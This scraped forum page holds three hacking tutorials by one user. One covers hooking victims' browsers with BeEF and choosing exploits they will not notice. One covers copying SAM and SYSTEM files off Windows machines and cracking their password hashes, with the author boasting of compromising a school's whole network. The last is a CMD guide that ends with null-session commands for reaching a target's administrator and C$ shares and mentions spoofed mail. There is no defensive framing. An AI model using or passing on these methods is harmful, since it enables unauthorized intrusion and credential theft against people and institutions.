1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Skyline Geek

    Hacking with BEeF, May 3, 2017
  1. Skyline Geek


    What is BEeF?
    When skids are asked what they use to hack Metasploit is the usual answer, mostly because they don't know any other way to do it. BEeF (I don't know what the lower-case e is for) stands for Browser Exploitation Framework is the equivelant to Metasploit for Browsers. In the land of Web-borne and mobile exploitation, BeEF focuses on one backdoor which is the web browser.

    How is BeEF used for hacking?
    Before being able to use BeEF's framework one must first "Hook" a browser, BeEF provides a hook URL that can be used. A popular way of Hooking a target is usually by putting the hook script into your webpage. After the target is "hooked" you can begin using the BeEF framework's many commands, including using metasploit.

    Running BeEF:
    The first thing you're going to have to do is CD to where BeEF is located, on Kali you can do this by inputing the code below:
     cd /usr/share/beef-xss
    then run the BeEF script
    This is the console output that should pop up after you run the script.

    BEeF console.

    I know it's a bit confusing but I'll elaborate, Hook UI is the interface where commands are sent and your list of zombies is viewed, we'll be looking into that in a bit. First we're going to talk about the hook URL which is what hooks the victim's browser. Below I'll put an example of some web code which should hopefully clarify how this hook URL is used.

    <script src="" type="text/java"></script>
    The above is an example of me injecting my hook url into an html page, I am sure this is not the only way to get someone to run your shit, Google or get creative with it.

    The BeEF Interface:
    Opening the BeEF UI URL will greet you with a browser interface and a log-in screen, the default username and password are both "beef". After logging in you'll be led to the interface where commands can be sent to hooked browsers.

    What the interface looks like. (open)
    Beef GUi.

    One very important detail to look at is the traffic light system that BeEF uses to tell you what exploits work on the victim.
    • Green means that you can use this exploit on the victim without him knowing.
    • Orange means you can use an exploit but it may be visible to the target.
    • Red means the exploit CANNOT be used against the target.
    • Grey means the target hasn't been measured on this particular exploit.

    That concludes our introduction to BeEF, I hope you learned something from this thread as I had a lot of fun making it. I don't usually contribute shit because I'm lazy but hopefully that will change.

    Additional Reading:
    Source #LearnHacking
  2. How to hack Windows Admin password, Apr 30, 2017
  3. Skyline Geek


    ok..... here are the full details.....

    this works on all windows till now ....

    Programs needed: SAMInside (doesn't matter which version or if demo)
    LC4 or LC5 (lophtcrack)( must be full version)
    NTFSPro (doesn't matter if demo)
    any bootdisk maker

    this works even if syskey encryption is employed...

    if it is FAT filesystem...

    just copy the sam file to an empty floppy disk (or you can preffer PenDrive as well :p ) and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

    if it is NTFS....

    u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

    use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

    AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 however, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

    I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

    If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windows pass.
  4. Useful Things to do on CMD !, Apr 26, 2017
  5. Skyline Geek

    Ever thought hacking can be so much easy on windows . here are few cool baisc tricks you can do on your windows machine using CMD

    First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.

    Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

    This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

    First thing you need to know is some very helpfull commands to use on CMD (Command Prompt).

    In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

    Back to commands:

    net view
    net use
    net user

    In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

    Lets start easy...

    1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

    ping x.x.x.x (x is the IP address)

    ping http://www.whatever.com (http://www.whatever.com is the website you want to ping, but you don't know the IP)
    OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

    2) nslookup : This command has many functionalities.

    One is for resolving DNS into IP.
    Lets say you know the website URL but you don't know its IP(and you want to find out).

    nslookup http://www.whatever.com (http://www.whatever.com is the website you want to find out the IP)
    Now, another really nice function of nslookup is to find out IP of specific Mail Severs

    nslookup (enter)
    set type=mx (enter)
    This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

    OK, now why would you want to have an IP of a mail server?
    To send spoofed mail to your friends or even for SE.
    In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.c....&threadid=2360

    3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

    OBS: This command is good to know the route a packet takes before it goes to the target box.

    tracert x.x.x.x (x is the IP address)

    tracert http://www.whatever.com (http://www.whatever.com is the website you don't know the IP)

    4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

    arp -a

    5) route : This command will show you the routing table, gateway, interface and metric.

    route print

    6) ipconfig : This command will show tons of very helpful things.

    Your IP, gateway, dns in use.


    ipconfig /all
    this command will give all that info but for all networks you might have it.

    Also, in case you have a dynamic IP and want to change it, then type...

    ipconfig /release (this will release your IP)
    ipconfig /renew (this will renew your iP)
    OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.

    7) netstat : This command will show you connection to your box.


    netstat -a (this will show you all the listening ports and connection with DNS names)
    netstat -n (this will show you all the open connection with IP addresses)
    netstat -an (this will combined both of the above)
    net view x.x.x.x or computername (will list the available sharing folders on the target box)

    Now some hints:

    net use \ipaddressipc$ "" /user:administrator
    (this command will allow you to connect to the target box as administrator)
    Now if you want to connect to the target box and browse the entire C drive, then use this command:

    net use K: \computernameC$
    (this will create a virtual drive on your "my computer" folder)
    OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set.

    And least but not last, the "help" command.


    This command will help you to understand what it does and all the switchs available for each command.
    Very useful if you know the command, but forgot the right switch.